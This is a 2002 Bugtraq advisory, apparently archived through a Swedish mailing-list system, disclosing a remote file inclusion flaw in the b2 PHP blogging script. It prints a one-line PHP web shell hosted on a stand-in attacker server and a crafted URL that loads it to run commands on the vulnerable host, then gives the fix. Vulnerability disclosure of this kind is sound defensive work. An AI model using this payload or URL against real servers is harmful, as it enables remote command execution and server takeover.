8400032 2002-05-06 10:13 +0000 /56 rader/ Frank <thran60@hotmail.com> Sänt av: joel@lysator.liu.se Importerad: 2002-05-06 17:12 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <22179> Ärende: b2 php remote command execution ------------------------------------------------------------ From: Frank <thran60@hotmail.com> To: bugtraq@securityfocus.com Message-ID: <20020506101337.9743.qmail@mail.securityfocus.com> Site: www.cafelog.com Vulnerable: b2 0.6pre2 and earlier. B2 is a php script which allows webmasters to quikly post news on the frontpage and let viewers interact with eachother. A bug exists in the scripts which allows an attacker to remotely execute commands. Exploit: Taken from /b2-include/b2edit.showposts.php *snippet* <?php include_once ("b2config.php"); include_once ($b2inc."/b2functions.php"); *snippet* But since b2config.php does not exist inside the directory, an attacker can define $b2inc himself. So if the attacker creates a file on his server, for example www.attacker.com , called b2functions.php, and he writes the following in it : <? system($cmd); ?> (note : the attacker's server must not be able to run php, it has to open the file as text) he can include the file like this : http://www.vulnerablehost.com/b2/b2- include/b2edit.showposts.php?b2inc=http://www.attacker.com&c md=ls This would execute the ls command on vulnerablehost.com. Fix: Copy b2config.php into the b2-include directory The vendor has been warned, and already released the same fix a few days earlier. (8400032) /Frank <thran60@hotmail.com>/-------------